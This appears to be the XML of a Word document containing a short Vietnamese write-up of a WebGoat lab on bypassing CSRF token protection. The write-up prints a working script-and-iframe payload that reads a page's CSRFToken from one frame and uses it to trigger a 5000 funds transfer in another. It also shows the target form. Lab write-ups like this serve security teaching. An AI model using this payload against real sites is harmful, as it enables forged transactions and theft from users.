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465BB" w14:textId="166CA909" w:rsidR="009A35FC" w:rsidRDefault="009A35FC" w:rsidP="009A35FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001C00DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tương tự câu trên, ở đây ta phải lấy thêm được Token để xác mình sau đó mới có thể thực hiện mục đích chuyển khoản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619D8620" w14:textId="21AFAEA2" w:rsidR="00B64E13" w:rsidRDefault="00B64E13" w:rsidP="009A35FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B64E13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lấy được Token thực thi lệnh chuyển khoản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F8FBA" w14:textId="1B0B2A90" w:rsidR="009A35FC" w:rsidRDefault="00B64E13" w:rsidP="009A35FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B64E13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiến hành:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A35FC">
        <w:t xml:space="preserve">Theo hướng dẫn code thực thi ở phần message là </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D98F69" w14:textId="77777777" w:rsidR="009A35FC" w:rsidRDefault="009A35FC" w:rsidP="009A35FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00445CE0">
        <w:t>&lt;script&gt;var tokensuffix;function readFrame1(){var frameDoc = document.getElementById("frame1").contentDocument;var form = frameDoc.getElementsByTagName("form")[0];tokensuffix = '&amp;CSRFToken=' + form.CSRFToken.value;loadFrame2();}function loadFrame2(){var testFrame = document.getElementById("frame2");testFrame.src="http://localhost:8080/WebGoat/attack?Screen=XXX&amp;menu=YYY&amp;transferFunds=5000" + tokensuffix;}&lt;/script&gt;&lt;iframe</w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:tab/>
        <w:t>src="http://localhost:8080/WebGoat/attack?Screen=XXX&amp;menu=YYY&amp;transferFunds=main"onload="readFrame1();"id="frame1" frameborder="1" marginwidth="0"marginheight="0" width="800" scrolling=yes height="300"&gt;&lt;/iframe&gt;&lt;iframe id="frame2" frameborder="1" marginwidth="0"marginheight="0" width="800" scrolling=yes height="300"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F9BDD" w14:textId="77777777" w:rsidR="009A35FC" w:rsidRDefault="009A35FC" w:rsidP="009A35FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Và ở Tittle là </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEB5CB5" w14:textId="77777777" w:rsidR="009A35FC" w:rsidRDefault="009A35FC" w:rsidP="009A35FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00445CE0">
        <w:t xml:space="preserve">&lt;form accept-charset='UNKNOWN' id='transferForm' method='POST' action='attack?Screen=XXX&amp;menu=YYY' enctype='application/x-www-form-urlencoded'&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:tab/>
        <w:t xml:space="preserve">&lt;input name='transferFunds' type='text' value='0'&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:tab/>
        <w:t xml:space="preserve">&lt;input name='CSRFToken' type='hidden' value='1745740650'&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:tab/>
        <w:t>&lt;input type='submit'&gt; &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46504320" w14:textId="77777777" w:rsidR="009A35FC" w:rsidRDefault="009A35FC" w:rsidP="009A35FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Theo đó ta có thể lấy được giá trị tại </w:t>
      </w:r>
      <w:r w:rsidRPr="00445CE0">
        <w:t xml:space="preserve">'CSRFToken' </w:t>
      </w:r>
      <w:r>
        <w:t>và dùng chính nó để gửi đi ở Tittle và nhận kết quả tại message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C96B4" w14:textId="7F8D437A" w:rsidR="001B720A" w:rsidRDefault="009A35FC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6962A61D" wp14:editId="3A23B549">
            <wp:extent cx="5004020" cy="2814762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544" cy="282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29"/>
    <w:rsid w:val="001B720A"/>
    <w:rsid w:val="001C00DC"/>
    <w:rsid w:val="009A35FC"/>
    <w:rsid w:val="00A83278"/>
    <w:rsid w:val="00AD5329"/>
    <w:rsid w:val="00B6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F10F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{75E89EB2-34C1-4322-8C9B-AD487B4A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2020-05-24T19:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-24T19:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>